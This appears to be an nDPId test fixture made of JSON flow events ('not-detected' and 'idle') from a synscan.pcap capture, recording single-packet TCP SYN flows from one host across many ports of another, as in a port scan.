+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1554,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060800,"flow_last_seen":1278275060800,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":648,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1550,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060800,"flow_last_seen":1278275060800,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6792,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1550,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060800,"flow_last_seen":1278275060800,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6792,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058030,"flow_last_seen":1278275058030,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2701,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058030,"flow_last_seen":1278275058030,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2701,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1048,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060072,"flow_last_seen":1278275060072,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2702,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1048,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060072,"flow_last_seen":1278275060072,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2702,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2701,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2701,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1107,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060181,"flow_last_seen":1278275060181,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2702,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1107,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060181,"flow_last_seen":1278275060181,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2702,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1436,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060641,"flow_last_seen":1278275060641,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2710,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1436,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060641,"flow_last_seen":1278275060641,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2710,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1510,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2710,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1510,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2710,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1138,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":15000,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1138,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":15000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1209,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":15000,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1209,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":15000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":877,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059847,"flow_last_seen":1278275059847,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":15002,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":877,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059847,"flow_last_seen":1278275059847,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":15002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":296,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":666,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":296,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":666,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1183,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060291,"flow_last_seen":1278275060291,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":15003,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1183,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060291,"flow_last_seen":1278275060291,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":15003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":928,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":15002,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":928,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":15002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1024,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":667,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1024,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":667,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":324,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":666,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":324,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":666,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1272,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060393,"flow_last_seen":1278275060393,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":15003,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1272,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060393,"flow_last_seen":1278275060393,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":15003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1639,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":668,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1639,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":668,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1081,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060175,"flow_last_seen":1278275060175,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":667,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1081,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060175,"flow_last_seen":1278275060175,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":667,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":133,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":15004,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":133,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":15004,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":302,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":19101,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":302,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":19101,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1702,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":668,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1702,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":668,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":732,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059631,"flow_last_seen":1278275059631,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2717,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":732,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059631,"flow_last_seen":1278275059631,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2717,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":159,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":15004,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":159,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":15004,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 